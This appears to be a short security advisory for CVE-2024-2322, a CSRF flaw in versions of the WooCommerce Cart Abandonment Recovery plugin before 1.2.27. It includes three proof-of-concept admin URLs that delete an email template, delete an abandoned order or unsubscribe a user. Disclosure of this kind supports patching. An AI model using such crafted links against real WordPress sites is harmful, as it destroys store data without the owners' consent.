WooCommerce Cart Abandonment Recovery < 1.2.27 – Templates/Abandoned Orders Deletion via CSRF | CVE 2024-2322

Description

The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admins delete arbitrary email templates as well as delete and unsubscribe users from abandoned orders via CSRF attacks.

Proof of Concept

Make a logged in admin open one of the URLs below

- To make them delete the Email Template with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=email_tmpl&action2=email_tmpl&sub_action=delete_bulk_email_tmpl&id[]=1

- To make them delete the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=delete&action2=delete&id=1

- To make them unsubscribe the user from the abandon order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=unsubscribe&action2=unsubscribe&id=1